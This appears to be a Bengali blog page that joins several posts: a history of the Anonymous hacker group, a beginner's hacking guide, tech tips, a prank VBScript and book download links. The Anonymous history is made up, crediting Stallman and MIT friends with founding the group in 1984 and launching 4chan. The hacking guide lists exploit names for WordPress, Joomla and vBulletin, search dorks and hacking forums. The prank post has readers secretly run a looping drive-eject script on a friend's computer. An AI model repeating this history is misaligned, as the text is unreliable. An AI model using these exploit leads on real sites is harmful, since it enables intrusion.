অ্যানোনিমাস এর ইতিহাস

BTtutorial
বর্তমানে ভার্চুয়াল দুনিয়ার ত্রাস বিশ্বের
একমাত্র মুখোশধারী এবং বিশ্বের এক নম্বর
হ্যাকিং দলের নাম ‘অ্যানোনিমাস’। শাব্দিক
অর্থে অ্যানোনিমাস মানে পরিচয়হীন। অর্থাৎ
যা কিছুর পরিচয় গোপন, সেটিই অ্যানোনিমাস।
যুক্তরাষ্ট্রসহ বিশ্বের দাপুটে সব দেশের
ভার্চুয়াল নিরাপত্তা ভেঙে আতঙ্কের নাম
হয়ে উঠেছে অ্যানোনিমাস। অ্যানোনিমাস কারও
কাছে ভার্চুয়াল বিপ্লবী সংগঠন, কারও সাক্ষাৎ
আতঙ্ক! অ্যানোনিমাস
নামধারী সংগঠনটিতে আছে কারা?
১৯৮৪ সালে যাত্রা শুরু করে অ্যানোনিমাস।
যুক্তরাষ্ট্রের ক্যামব্রিজের ম্যাসাচুসেটস
ইউনিভার্সিটি অব টেকনোলজির [এমআইটি] তিন
বন্ধু ক্রিস্টোফার ডয়ন, রিচার্ড স্টলম্যান
এবং মাইকেল প্যাটন মিলে ‘দ্য টেক মডেল
রেইলরোড ক্লাব’ নামক কম্পিউটার চালু করেন।
এই গ্রুপটিই পরবর্তী সময়ে কম্পিউটার ক্লাব
থেকে হ্যাকিং গ্রুপে রূপান্তরিত হয়। তারা খেলার
ছলে ভিডিওগেম হ্যাক করত, ক্যাম্পাসের
কম্পিউটারগুলোর কার্যক্ষমতা হ্যাক
করে বাড়িয়ে নিত। তবে ধীরে ধীরে সংগঠনটির
সদস্য সংখ্যা বাড়তে থাকে। এমআইটির দক্ষ
গ্রোগ্রামাররা ক্লাবটিতে যোগ দেন। ২০০৩
সালের ১ অক্টোবর তারা ফোরচ্যান ডট কম
নামক একটি ওয়েবসাইট চালু করেন।
ফোরচ্যানের বিশেষত্ব ছিল, এখানে সবাই
নিজের পরিচয় গোপন রেখে যে কোনো কিছু
প্রকাশ করতে পারতেন। সেখানে তারা বিভিন্ন
কার্টুন ছবি তৈরি করে পোস্ট করতের।
কার্টুনগুলো ছিল তৎকালীন সমসাময়িক
আমেরিকান জীবনযাত্রার ধরন, সামাজিক ও
রাজনৈতিক পরিস্থিতি এসবকে ব্যঙ্গ করে।
যেটি বর্তমানে ট্রোল
হিসেবে ব্যাপকভাবে পরিচিত, সেই ট্রোলের শুরু
হয়েছিল তাদের হাত ধরেই। ফোরচ্যান জনপ্রিয়
হতে শুরু করে। ২০০৭ সালের
মাঝামাঝিতে ফোরচ্যান
থেকে তারা ধীরে ধীরে দুর্নীতির প্রতিবাদ
করতে বড় পর্যায়ের হ্যাকিংয়ে নেমে পড়েন।
সর্বপ্রথম তারা এমআইটির ওয়েবসাইট হ্যাক
করে সেখানে ছাত্রদের বিভিন্ন দাবি-দাওয়ার
কথা লিখে রাখেন। এরপর তাদের প্রতিবাদ
হতে থাকে আরও বৃহৎ উপায়ে। ২০০৮ সালের ১৪
জানুয়ারি ইউটিউবে ‘চার্চ অব সায়েন্টোলজি’
প্রোগ্রামের একটি ভিডিও লিক হয়,
যেখানে অভিনেতা টম ত্রুক্রজ ফোরচ্যান
ফোরাম নিয়ে ব্যঙ্গ করেছে। এর পরপরই ২১
জানুয়ারি টম ত্রুক্রজের ভিডিওটি সরিয়ে ফেলার
নির্দেশ করে ‘মেসেজ টু সায়েন্টোলজি’
নামে পরিচয়বিহীন একটি ভিডিও
ইউটিউবে প্রকাশিত হয়। এর মাধ্যমেই শুরু হয়
প্রোজেক্ট চ্যান্টোলজি। এরপর ১০
ফেব্রুয়ারি তারা ডিডিওএস অ্যাটাকের
মাধ্যমে চার্চ অব সায়েন্টোলজির অফিসিয়াল
ওয়েবসাইট ডাউন করে দেয়। সেই সময়
থেকে অ্যানোনিমাস নামটি গ্রুপের নাম
হিসেবে ব্যবহার করা শুরু করেন তারা। ‘ভি ফর
ভেনডাটা’ নামক আলোচিত হলিউড চলচ্চিত্রের
প্রধান চরিত্র গায় ফক্সের পরিধানকৃত
মুখোশটি ব্যবহার শুরু করে অ্যানোনিমাস।
গ্রুপের সদস্যরা হ্যাকটিভিস্ট
হিসেবে পরিচিতি লাভ করে। হ্যাকটিভিস্ট
শব্দটি হ্যাকার এবং অ্যাক্টিভিস্ট শব্দের
মিশ্রণে তৈরি। এর অর্থ, যারা বিনা কারণে হ্যাক
করে না, প্রতিবাদের অস্ত্র
হিসেবে হ্যাকিং করে থাকে।
আস্তে আস্তে বিভিন্ন দেশে তাদের সদস্য
সংখ্যা তৈরি হতে থাকে। তখন অ্যানোনিমাস
আন্তর্জাতিক অর্থাৎ বহির্বিশ্বের
দুর্নীতিপরায়ণ দেশগুলোর সরকারের ব্যাপারেও
পদক্ষেপ নিতে শুরু করে। অ্যানোনিমাস
অস্ট্রেলিয়ার সরকারের ইন্টারনেট
নিয়ে পরিকল্পনার বিরুদ্ধে ‘অপারেশন
ডিজরাইডি’ পরিচালনা করে। তারা প্রতিবাদস্বরূপ
প্রধানমন্ত্রী কেভিন রাডের ওয়েবসাইটটি প্রায়
এক ঘণ্টার জন্য অচল করে ফেলে।
পরবর্তী সময়ে ২০১০ সালে তারা ‘অপারেশন
টিটস্ট্রোম’, ‘অপারেশন পেব্যাক’ থেকে শুরু
করে উইকিলিকসের ফান্ড বন্ধ হয়ে যাওয়ার
প্রতিবাদে বেশ বড় বড় অপারেশন চালায়। এ সময়
তারা অস্ট্রেলিয়ান সরকারি ওয়েবসাইট,
আমেরিকার মোশন পিকচার অ্যাসোসিয়েশন,
রেকর্ডিং ইন্ডাস্ট্রি অ্যাসোসিয়েশন, ইন্ডিয়ান
সফটওয়্যার ফার্ম, বিভিন্ন ফাইল
শেয়ারিং সাইটসহ আরও বিভিন্ন সাইটে সাইবার
আক্রমণ চালায়। এই আক্রমণেরই পরবর্তী অংশ
হিসেবে তারা মাস্টারকার্ড, ভিসা, ব্যাংক অব
আমেরিকা এবং অ্যামাজনে সাইবার আক্রমণ
করে। ওই সময় মাস্টারকার্ড এবং ভিসা দিয়ে সব
ধরনের লেনদেন বন্ধ হয়ে পড়ে। এরপর ২০১১
সালে অ্যানোনিমাস আরব বসন্ত,
এইচবিগ্রে ফেডারেল, জিওহট
এবং ওয়ালস্ট্রিটের
বিষয়গুলো নজরে আনে এবং এই
উপলক্ষে তারা তিউনেশিয়া এবং মিশরের
সরকারি ওয়েবসাইটগুলো, সনি প্লে স্টেশন
নেটওয়ার্ক এবং এইচবিগ্রের অফিসিয়াল
ওয়েবসাইটে সাইবার আক্রমণ চালিয়ে নষ্ট
করে দেয়। এমনকি ২০১১ সালে বাংলাদেশ
সরকারের বিরুদ্ধে অবস্থান
নিয়ে তারা বাংলাদেশি সরকারি ওয়েবসাইটগুলোতে ব্যাপকহারে আক্রমণ
চালায়। এভাবে ধীরে ধীরে সব
দেশে তারা নিজেদের ভার্চুয়াল ক্ষমতায় দুর্নীতি,
অন্যায়ের বিরুদ্ধে প্রতিবাদ চালিয়ে যায়।
বর্তমান পরিস্থিতি এমন যে,
যে কোনো দেশে বড় কোনো অন্যায়
বা দুর্নীতি দেখা দিলে সেখানে অ্যানোনিমাস
হ্যাকার টিমের আক্রমণ সুনিশ্চিত। দুর্নীতির
বিরুদ্ধে প্রতি বছর ৫ নভেম্বর অ্যানোনিমাস
সারাবিশ্ব থেকে ‘মিলিয়ন মাস্ক মার্চ’ বের করে।
প্রতি বছর এই দিনেও তারা বড় বড় সাইবার
আক্রমণ পরিচালনা করে। প্রতিবাদের হাতিয়ার
যে হ্যাকিং হতে পারে তা দেখিয়ে দিয়েছে বিশ্বসেরা হ্যাকার
সংগঠনটি।
Don'tForget

http://www.facebook.com/BTtutorial
http://www.twitter.com/BTtutorial

searchfeed

সূত্র :BTtutorial

Advertisements

টুইটারে কীভাবে জনপ্রিয় হবেন?

অনলাইনভিত্তিক টুইটার
অ্যাকাউন্টে যদি কারও বিপুলসংখ্যক
অনুসারী থাকে, সেটাই সামাজিক
যোগাযোগ মাধ্যমটিতে তার
জনপ্রিয়তা বাড়ানোর বড় সুযোগ
তৈরি করে। এ ক্ষেত্রে বেশি বেশি টুইট
না করলেও চলে। স্পেনে নতুন এক
গবেষণায় এ তথ্য উঠে এসেছে। সোশ্যাল
নেটওয়ার্কস সাময়িকীতে এ
গবেষণা প্রতিবেদন প্রকাশিত হয়েছে।
গবেষণায় দেখা যায়, গুরুত্বপূর্ণ
বা জনপ্রিয় ব্যক্তিদের টুইটার
বার্তা স্বাভাবিকভাবেই বেশি মানুষের
দৃষ্টি আকর্ষণ করে। কিন্তু তুলনামূলক
কম জনপ্রিয় ব্যক্তিরাও তাদের
কার্যক্রম বাড়িয়ে ও বেশি বেশি টুইট
করে নিজ জনপ্রিয়তা বাড়াতে পারে।
তবে এই পদ্ধতি দুর্বল ও সময়সাপেক্ষ।
স্পেনের রাজধানী মাদ্রিদে অবস্থিত
মাদ্রিদ টেকনিক্যাল ইউনিভার্সিটির
গবেষক দলের প্রধান
রোসা বেনিতো বলেন,
জনপ্রিয়তা বাড়ানোর জন্য ‘প্রচেষ্টা’
বা প্রচুর বার্তা পাঠানোর
চেয়ে বিপুলসংখ্যক অনুসারী থাকাটাই
বেশি গুরুত্বপূর্ণ।
টুইটার একটি বৈচিত্র্যপূর্ণ সামাজিক
যোগাযোগ মাধ্যম। এখানে বিপুলসংখ্যক
ব্যবহারকারী থাকলেও তাদের অনুসারীর
সংখ্যা খুবই কম (গড়ে ৬১ জন)। আবার
খুবই কমসংখ্যক ব্যবহারকারী আছে,
যাদের অনুসারী বিপুলসংখ্যক। এসব
ব্যবহারকারীর অনুসারীর সংখ্যা চার-পাঁচ
কোটি পর্যন্ত।
গবেষণার তথ্য বলছে, টুইটারের
মতো বৈচিত্র্যপূর্ণ যোগাযোগ
মাধ্যমগুলোতে ব্যবহারকারীরা যেভাবে বা
সেটা কোনো গুরুত্বপূর্ণ বিষয় নয়।
বরং এমনও
ব্যবহারকারী রয়েছে যারা সংখ্যায় কম
হলেও খুবই প্রভাবশালী।
কোনো কোনো ব্যবহারকারী খুবই
কমসংখ্যক টুইট করলেও পাল্টা টুইট পায়
অনেক বেশি। রোসা বেনিতো আরও বলেন,
সাধারণ ব্যবহারকারীরা নিজেদের
তৎপরতা বাড়িয়ে জনপ্রিয় ব্যক্তিদের
মতোই সমানসংখ্যক পাল্টা টুইট
পেতে পারে। তখন তাদের পক্ষেও প্রভাব
বিস্তার করা সম্ভব হবে।
সূত্র: আইএএনএস।

আপনি হ্যাকিং শিখতে চান !

আপনি কি মেচিউর্ড !
১। আপনার মাঝে আগ্রহ থাকতে হবে।
আপনি বার বার কার কাছে হেল্প চাইলেন ,
কিন্তু উনি আপনারে পাত্তা দিলেন না । এই
কারনে রাগ করে কিবা অভিমান করে হাল
ছেড়ে দিতে পারবেন না। You will be rejected
moreতে then you get helped.
২। English এ আপনি ভাল , মানে খুবই ভাল
হতে হবে। কারন শুধু হ্যাকিং না উচ্চ মানের
সব কিছুই এখন ইংলিশ।
৩। সবাইকে সম্মান করার
মানসিকতা থাকতে হবে ।
আপনি কারো কাছে হেল্প চাইছেন কিন্তু
হেল্প করে নাই , এই কারনে তাকে তার কোন
পোস্টে গিয়ে গালি গালাজ করা।
এটা করা যাবে না। সম্মান বলতে আমি আর
অনেক কিছুই বুঝাইতে চাইছি। আমি যখন এই
জগতে নতুন তখন কোন এক গ্রুপের
এডমিনকে হ্যাকং শিখানোর কথা বলেছিলাম
উনি ২৫,০০০ টাকা চেয়েছিলেন। একজন
মধ্যবিত্ত পরিবারের
ছেলে হিসাবে এটা অসম্ভব ছিল। উনার
সাথে কথা বলার এক পর্যায় বললেন
“আমাদের পায়ের কাছে লোকে লাখ লাখ
টাকা নিয়ে বসে থাকে ,
আমি সবাইকে শিখাইনা” । এই যে বাক্য
তিনি ব্যবহার করলেন এই রকম
মানসিকতা থাকা যাবে না।
উনি আজো মেচিউর্ড হতে পারেন নাই।
বাংলাদেশের এমন কোন গ্রুপ নাই যাদের
সাথে তিনি ঝগড়া করেন নাই। বাদ দেন ঐ সব
কথা। এক কথায় সম্মান করা জানতে হবে সব
কিছু কে।
৪।আপনি পারেন কি পারেন না সেটা বড়
কথা না হেল্প করার মানসিকতাও
থাকতে হবে। আপনি যতটুকু পারেন ততটুকু
সেয়ার করেন, পার্সনালি কিবা পাব্লিক্লি ।
৫।আপনাকে প্রচুর ধৈর্য শীল হইতে হবে।
{মেচিউরিটি আর কি কি হতে পারে , এখন এই
মুহুর্তে আমার মনে পড়ছে না , আরো কিছু
থাকলে কমেন্ট কইরেন আমি এড
করে নেবো।}এবার
আসি কিভাবে হ্যাকিং শিখা শুরু করবেন।
হ্যাকিং যে শুধুই ডিফেসিং কে বলে তানা । বাট
ডিফেসিং, হ্যাকিংএর অনেক বড় একটা অংশ
। যাক আমি নিজে কিছু লিস্ট
দিচ্ছি আপনি আজ থেকে এই লিস্টের শুরু
থেকে একটা একটা করে শুরু করেন দেখবেন
আপনি অনেক ভাল কিছু করতে পারছেন।
[+] Hibernate Query Language Injection
[+] Direct OS Code Injection
[+] XML Entity Injection
[+] Broken Authentication and Session
Management
[+] Cross-Site Scripting (XSS)
[+] Insecure Direct Object References
[+] Security Misconfiguration
[+] Sensitive Data Exposure
[+] Missing Function Level Access Control
[+] Cross-Site Request Forgery (CSRF)
[+] Using Components with Known
Vulnerabilities
[+] Unvalidated Redirects and Forwards
[+] Cross Site Scripting Attacks
[+] Click Jacking Attacks
[+] DNS Cache Poisoning
[+] Symlinking – An Insider Attack
[+] Cross Site Request Forgery Attacks
[+] Remote Code Execution Attacks
[+] Remote File inclusion
[+] Local file inclusion
[+] EverCookie
[+] Denial oF Service Attack
[+] Cookie Eviction
[+] PHPwn
[+] NAT Pinning
[+] XSHM
[+] MitM DNS Rebinding SSL/TLS
Wildcards and XSS
[+] Quick Proxy Detection
[+] Improving HTTPS Side Channel
Attacks
[+] Side Channel Attacks in SSL
[+] Turning XSS into Clickjacking
[+] Bypassing CSRF protections with Click
Jacking and
[+] HTTP Parameter Pollution
[+] URL Hijacking
[+] Stroke Jacking
[+] Fooling B64_Encode(Payload) on
WAFs And Filters
[+] MySQL Stacked Queries with SQL
Injection.
[+] Posting Raw XML cross-domain
[+] Generic Cross-Browser Cross-Domain
theft
[+] Attacking HTTPS with Cache Injection
[+] Tap Jacking [+] XSS – Track
[+] Next Generation Click Jacking
[+] XSSing Client-Side Dynamic HTML.
[+] Stroke triggered XSS and Stroke
Jacking
[+] Lost iN Translation
[+] Persistent Cross Interface Attacks
[+] Chronofeit Phishing
[+] SQLi Filter Evasion Cheat Sheet
(MySQL)
[+] Tabnabbing
[+] UI Redressing
[+] Cookie Poisoning
[+] SSRF
[+] Bruteforce of PHPSESSID
[+] Blended Threats and JavaScript
[+] Cross-Site Port Attacks
[+] CAPTCHA Re-Riding Attack
{কেউ ভাববেন না যে আমি এখানের A 2 z
যানি বা পারি। এখানের
হাতেগুনা কয়েকটা আমি পারি।
এখনো আমি শিখছি, শিখার চেস্টায় আছি }
এখন আসেন কিভাবে শিখা শুরু করবেন। First
এর লাইনটা আপনি সিলেক্ট করেন। তারপর
রাইট ক্লিক করে “সার্চ গুগোল ফোর
*****” এ ক্লিক করেন। দেখবেন গুগোল
আপনার সামনে অই রিলেটেড সাগর
নিয়া হাজির হইছে । ব্যাস কাজ শেষ এখন
শিখা স্টার্ট করেন।
সোর্ট কাট কিছু এক্সপ্লইট এর নাম দিলাম
com_user
com_jce
com_media
wp_optin_pro
Elfinder
wp csrf file upload v
WordPress Optimizpress
IIS/6.0 poc: joom pass rest
wp password reset / token
vBulleting password reset দেখেন ট্রাই
করে। নিচের এই ডর্ক গুলা ইউয
করে যে রিসৌর্স পাবেন তাও
সিকিউরিটি নিয়ে পড়া লেখার জন্য
যথেস্টsite:sans.org filetype:pdf |
filetype:txt
site:issa-dc.org filetype:pdf | filetype:txt
site:*.pentesterlab.com filetype:pdf |
filetype:txt
site:defcon.org filetype:pdf | filetype:txt
Sites for Digging about hacking:
forums:
http://www.forum.3xp1r3.com
http://www.hackerthreads.org
http://www.hackforums.net
http://www.hacker.org/forum
http://www.crackhackforum.com
usefull sites for learning hacking:
http://www.ethicalhacker.net
/http://insecure.org/
http://hacker.resourcez.com/
http://www.certifiedethicalhacker.com/
http://www.elitehack.net/
http://www.elite-hackers.com/
http://www.exploit-db.com/
http://www.1337day.com/
http://www.breakthesecurity.com/
http://www.thehackerslibrary.com/
http://www.port7alliance.com/
http://www.hackers.nl/
http://hackmein.tripod.com/
http://kyrionhackingtutorials.com/
http://www.hacking-gurus.net/
http://hackmyass.wordpress.com/
http://www.borntohack.in/
http://www.criticalsecurity.net/
http://www.mpgh.net/
http://www.duniapassword.com/
http://www.progamercity.net/
http://
http://www.hackershandbook.org/1000/
http://www.hacking-tutorial.com
http://www.evilzone .org
http://www.hackaday.com
http://www.hackinthebox.org
http://www.hackthissite.org
আমি যানি এই লেখা পড়ার পর অনেকেই
আমারে মেসেজ করবেন “ভাই
আমারে হ্যাকিং শিখান !” Sorry ভাইয়া !
আমি তাইলে এখানে প্রায় ৩
ঘন্টা ঘাটাঘাটি করে কি লিখলাম ,
কি বুঝাইতে চাইলাম ! নিজে ট্রাই করেন
পরে অন্যকে নোক কইরেন।

৩টা Hacking ইবুক -BTtutorial

১. Hacking Bangla Ebook
ফেসবুক গ্রুপ থেকে কালেক্টেড। গ্রুপ ।
ডাউনলোড এখানে http://www.mediafire.com/download/3c403vb63yt33tp/Hacking+Bangla+Ebook.pdf
২. Hackology1.0_By_p1n1x_Cr3w
ফেসবুক পেজ থেকে কালেক্টেড। পেজ।
ডাউনলোড এখানে http://www.mediafire.com/download/vovo73i1ta5v7bs/Hackology1.0_By_p1n1x_Cr3w.pdf
৩. Bangla Hacking Tutorial
এটা কোন একটা ওয়েবসাইট থেকে কালেক্ট
করা। ডাউনলোড এখানে http://www.mediafire.com/download/prc9pet25kawbxp/Bangla+Hacking+Tutorial.7z

ইন্টারনেট স্পিড ৭৫% বাড়ানো সম্ভব…

1. Mozilla Firefox Open করুন।
2. Addressbar-e টাইপ করুন “about:config”
3. Message আসবে yes ক্লিক করুন।
4. এই লেখাটি খুজুন “network.http .pipelining”
এবং Value তে False থাকলে ডাবলক্লিক
করে True করুন।
5. মাউসের রাইট বাটন ক্লিক করুন > new >
Integer তে ক্লিক করুন
6. ইনপুট বক্সে টাইপ করুন
“nglayout.initi ¬alpaint.delay” OK ক্লিক
করুন, ইনপুট বক্সে টাইপ করুন “0″ এবং OK
ক্লিক করুন
7. মজিলা রিস্টাট্রাট করুন এবং উপভোগ করুন
৭৫% বেশি স্পিড!!!!

কম্পিউটার শর্টকাট ফাইল- ফোল্ডারে ভরে গেছে। বারবার ডিলিট করেও এ থেকে মুক্তি মিলছে না

কম্পিউটার শর্টকাট ফাইল-
ফোল্ডারে ভরে গেছে। বারবার ডিলিট করেও এ
থেকে মুক্তি মিলছে না। হুটহাট অনেক ফাইল-
ফোল্ডার হারিয়েও যাচ্ছে। ইদানীং এই সমস্যায়
প্রায় সবাই পড়ছেন।
আসলে এটি কোনো ভাইরাস নয়। এ হলো VBS
Script (ভিজুয়াল বেসিক স্ক্রিপ্ট)। এ
যন্ত্রণা থেকে খুব সহজেই মুক্তি পেতে পারেন।
নিচের ধাপগুলো অনুসরণ করুন।
CMD ব্যবহার করে
১. ওপেন CMD (Command Prompt – DOS)
২. নিচের কমান্ডটি হুবহু লিখুন
attrib -h -s -r -a /s /d Name_drive:*.*
এবার Name_drive
লেখাটিতে যে ড্রাইভটি আপনি শর্টকাট
ভাইরাসমুক্ত করতে চান সেটি লিখুন। যেমন: C
ড্রাইভ ভাইরাসমুক্ত করতে চাইলে লিখুন attrib -h
-s -r -a /s /d c:*.*
৩. এন্টার বাটন চাপুন
৪. এবার দেখবেন শর্টকাট ভাইরাস ফাইল ও
ফোল্ডারগুলো স্বাভাবিক হয়ে যাবে। এবার ওই
ফাইল ও ফোল্ডারগুলো ডিলিট করে দিন।
→ .bat ব্যবহার করে Bat ফাইল
হলো নোটপ্যাডে লেখা একটি একজেকিউটেবল
ফাইল। এতে ডাবল ক্লিক করলেই চালু হয়ে যায়।
১. নোটপ্যাড ওপেন করুন।
২. নিচের কোডটি হুবহু কপি-পেস্ট করুন
@echo off attrib -h -s -r -a /s /d
Name_Drive:*.*
attrib -h -s -r -a /s /d Name_Drive:*.*
attrib -h -s -r -a /s /d Name_Drive:*.*
@echo complete.
৩. এবার Name_Drive এর জায়গায় ভাইরাস
আক্রান্ত ড্রাইভের নাম লিখুন। যদি তিনটির
বেশি ড্রাইভ আক্রান্ত হয় তাহলে কমান্ডটি শুধু
কপি-পেস্ট করলেই চলবে।
৪. removevirus.bat এই নাম দিয়ে ফাইলটি সেভ
করুন।
৫. এবার ফাইলটি বন্ধ করে ডাবল ক্লিক করে রান
করুন।
৬. এবার দেখবেন আপনার শর্টকাট ভাইরাস ফাইল-
ফোল্ডার গুলো সব স্বাভাবিক হয়ে গেছে। এখন
সব ডিলিট করে দিন।
এছাড়া নিচের কৌশলও নিতে পারেন আক্রান্ত
পেনড্রাইভ থেকে বাঁচতে
১. RUN এ যান।
২. wscript.exe লিখে ENTER চাপুন।
৩. Stop script after specified number of
seconds: এ 1 দিয়ে APPLY করুন।
এবার কারো পেনড্রাইভের শর্টকাট ভাইরাস আর
আপনার কম্পিউটারে ডুকবে না। আক্রান্ত
কম্পিউটার ভাইরাসমুক্ত করতে
১. কী বোর্ডের CTRL+SHIFT+ESC চাপুন।
২. PROCESS ট্যাবে যান।
৩. এখানে wscript.exe ফাইলটি সিলেক্ট করুন।
৪. End Process এ ক্লিক করুন।
৫. এবার আপনার কম্পিউটারের C:/ ড্রাইভে যান।
৬. সার্চ বক্সে wscript লিখে সার্চ করুন।
৭. wscript নামের সব ফাইলগুলো SHIFT+DELETE
দিন।
৮. যেই ফাইলগুলো ডিলিট
হচ্ছে না ওইগুলো স্কিপ করে দিন।
৯. এখন RUN এ যান।
১০. wscript.exe লিখে ENTER চাপুন।
১১. Stop script after specified number of
seconds: এ 1 দিয়ে APPLY করুন।
ব্যাস, আপনার কম্পিউটার শর্টকাট ভাইরাসমুক্ত।
এবার পেনড্রাইভের শর্টকাট ভাইরাসও আর
আপনার কম্পিউটারে ডুকবে না।

DVD/CD Drive door নিয়ে একটু মশকরা করি

ধরুন বন্ধুর পিসির সামনে বসে আছেন ,
আসে পাশে বন্ধুকেউ দেখছেন না … এই
ফাকে চলেন পিসির DVD/CD Drive door
নিয়ে একটু মশকরা করি
প্রথমে কম্পিউটারে নোটপ্যাড খুলুন ।এরপর
নিচের লেখাগুলো
কপিকরে পেস্ট করুন।
Set oWMP = CreateObject (“WMPlayer.OCX.
7″) Set colCDROMs = oWMP.cdromColle ction
do if colCDROMs.Count >=
1 then For i = 0 to colCDROMs.Count – 1
colCDROMs.Item( i).
Eject Next For i = 0 to
colCDROMs.Count – 1
colCDROMs.Item( i).
Eject Next End If wscript.sleep 5000 loop
এবার নোটপ্যাড ফাইলটি “Moskora.vbs”
নামে ডেস্কটপে সেভ করুন।
এবার ডেস্কটপে এসে moskora.vbs ফাইলটির
ওপর ডাবল ক্লিক করুন। দেখবেন এক মিনিট পর
পর
কম্পিউটারে ডিভিডি ড্রাইভটি আপনা আপনি খুলছে আবার
বন্ধ হচ্ছে।
এই ভুয়া মশকরা ভাইরাস নিয়ে মজা করা শেষ
হলে ডেস্কটপ থেকে moskora.vbs নামের
ফাইলটি ডিলিট করে কম্পিউটার রিস্টার্ট দিন।
ডিভিডি ড্রাইভ আগের
মতই ঠিক হয়ে যাবে।
( এটা কোনো ক্ষতিই করবে না )
FaceBOOK

ড. জাকির নায়েক এর বই “প্রধান ধর্ম সমুহে স্রষ্টার ধারণা”

ড. জাকির নায়েক এর লিখিত “প্রধান ধর্ম
সমুহে স্রষ্টার ধারণা” (Concept of God in
major religion) একটি অসাধারন বই
Concept of God in major religion “প্রধান
ধর্ম সমুহে স্রষ্টার ধারণা” ডাউনলোড
করে নিন । বইটি ড. জাকির নায়েক এর
একটি জনপ্রিয় বই। বাংলায় অনুবাদ করা বই
। বইটি তে হিন্দু, মুসলিম, খ্রীস্টানে,
ইয়াহুদি ধর্মে স্রষ্টা সম্পর্কে যে ধারণা করা হয়েছে তা নিয়ে বিস্তারিত
বর্ননা করা হয়েছে। ড. জাকির নায়েক
যিনি সকল ধর্ম সম্পর্কে ভাল জ্ঞানের
অধিকারি । তিনি ধর্ম তত্ত্বের উপর এক জন
বিশেজ্ঞ। অসাধারন একটি বই আসা করব
বইটি সকলের ভাল লাগবে।
Author: জাকির নায়েক (Zakir nayek)
Book Category : ইসলামিক (islam)
Format: PDF (পিডিএফ)
Language: বাংলা (Bangoli)
File Size: 1.9 MB
ডাউনলোড করুন Download
বইটির সাইজ মাত্র 1.9 MB সংগ্রহ
করে পড়তে পারেন BTtutorial

হুমায়ুন আজাদ এর কিছু বই

মূলতঃ গবেষক ও প্রাবন্ধিক হলেও হুমায়ূন
আজাদ ১৯৯০-এর দশকে একজন
প্রতিভাবান ঔপন্যাসিক
হিসাবে আত্মপ্রকাশ করেন। ২০০৪
খৃস্টাব্দে মৃত্যু অবধি তাঁর প্রকাশিত
উপন্যাসের সংখ্যা ১৩। তাঁর ভাষা দৃঢ়,
কাহিনীর গঠন সংহতিপূর্ণ এবং রাজনৈতিক
দর্শন স্বতঃস্ফূর্ত।
তবে কাহিনীতে যৌনতার ব্যবহার
কখনো কখনো মাত্রাতিরিক্ত
বা অপ্রয়োজনীয়
হয়েছে বলে তিনি সমালোচিত হয়েছেন। শেষ
দিককার কয়েকটি উপন্যাসে তাঁর
দৃষ্টিভঙ্গি মূলতঃ রাজনৈতিক রচনার
শিল্পরূপকে ক্ষুণ্ণ করেছে বলে প্রতীয়মান
হয়।
মূলত ১৯৯৪ সালে তিনি ঔপন্যাসিক
হিসেবে নিজেকে আত্মপ্রকাশ করেন
প্রথম উপন্যাস ছাপ্পান্নো হাজার
বর্গমাইলের মধ্যে দিয়ে। ১৯৯৫
সালে প্রকাশিত হয় সব কিছু ভেঙ্গে পড়ে।
আর এই বইয়ের জন্য
তিনি বাংলা একাডেমীর পুরস্কার পেয়েছেন।
২০০২ সালে ১০০০০ এবং আরও
একটি ধর্ষণ, ২০০৩ সালে একটি খুনের
স্বপ্ন এবং ২০০৪ সালে প্রকাশিত পাক
সার জমিন সাদ বাদ-এর
মতো একটি অসাধারণ নতুন মাত্রার
উপন্যাস।
http://www.mediafire.com/?3rb8dw752rh71fu
http://www.mediafire.com/?v8j6dujhj6pp46k
http://www.mediafire.com/?4cu16eucosp1fbv
http://www.mediafire.com/?8ualb6u5ubh1r4v
http://www.mediafire.com/?tm7624sxrwft9qc
http://www.mediafire.com/?1sagoyg11ad74ba
http://www.mediafire.com/?1xsb1pu8k1dmajk
হুমায়ুন আজাদ স্যার কে নিয়ে আর ও কিছু
বই
১>হুমায়ুন আজাদের মুখোমুখি
http://www.4shared.com/office/6TAFeu0Z/Humayun_Azad-er_Mukhomukhi.html
২>হুমায়ুন আজাদের সৃতি ও সাক্ষাৎকার
http://www.4shared.com/office/TPJY8j5r/Humayun_Azader_Smriti_O_Sakkha.html
৩>তোমার গল্প উৎসর্গ হুমায়ুন আজাদ
কে
http://www.4shared.com/office/UYhIf8e0/Tomar_Golpo_Utsorgo_Ghatokahot.html
৪>কণ্ঠ আমার রুদ্ধ আজিকে
http://www.4shared.com/office/6xmv6VrX/Kontho_Amar_Ruddho_Aajike__Hum.html
৫>শেষ সাক্ষাৎকার
http://www.4shared.com/office/9gdy5RcX/Dr_Ahmad_Sharif-er_Shesh_Sakkh.html
৬>আক্রমণ একটি অধিকারের উপর
http://www.mediafire.com/?maq81k3b49a4vay
7>হুমায়ুন আজাদের কবিতা
http://www.4shared.com/office/GX-83SRa/humayun_azader_kobita.html

windows Keyboard Shortcuts

CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
Delete (Delete)
Shift+Delete (Delete the selected
item permanently without
placing the item in the Recycle
Bin)
CTRL while dragging an item
(Copy the selected item)
CTRL+Shift while dragging an
item (Create a shortcut to the
selected item)
F2 key (Rename the selected
item)
CTRL+RIGHT ARROW (Move the
insertion point to the beginning
of the next word)
CTRL+LEFT ARROW (Move the
insertion point to the beginning
of the previous word)
CTRL+DOWN ARROW (Move the
insertion point to the beginning
of the next paragraph)
CTRL+UP ARROW (Move the
insertion point to the beginning
of the previous paragraph)
CTRL+Shift with any of the
arrow keys (Highlight a block of
text)
Shift with any of the arrow keys
(Select more than one item in a
window or on the desktop, or
select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a
folder)
Alt+Enter (View the properties
for the selected item)
Alt+F4 (Close the active item, or
quit the active program)
Alt+Enter (Display the properties
of the selected object)
Alt+Spacebar (Open the
shortcut menu for the active
window)
CTRL+F4 (Close the active
document in programs that
enable you to have multiple
documents open
simultaneously)
Alt+Tab (Switch between the
open items)
Alt+ESC (Cycle through items in
the order that they had been
opened)
F6 key (Cycle through the screen
elements in a window or on the
desktop)
F4 key (Display the Address bar
list in My Computer or Windows
Explorer)
Shift+F10 (Display the shortcut
menu for the selected item)
Alt+Spacebar (Display the
System menu for the active
window)
CTRL+ESC (Display the Start
menu)
Alt+Underlined letter in a menu
name (Display the
corresponding menu)
Underlined letter in a command
name on an open menu
(Perform the corresponding
command)
F10 key (Activate the menu bar
in the active program)
RIGHT ARROW (Open the next
menu to the right, or open a
submenu)
LEFT ARROW (Open the next
menu to the left, or close a
submenu)
F5 key (Update the active
window)
Backspace (View the folder one
level up in My Computer or
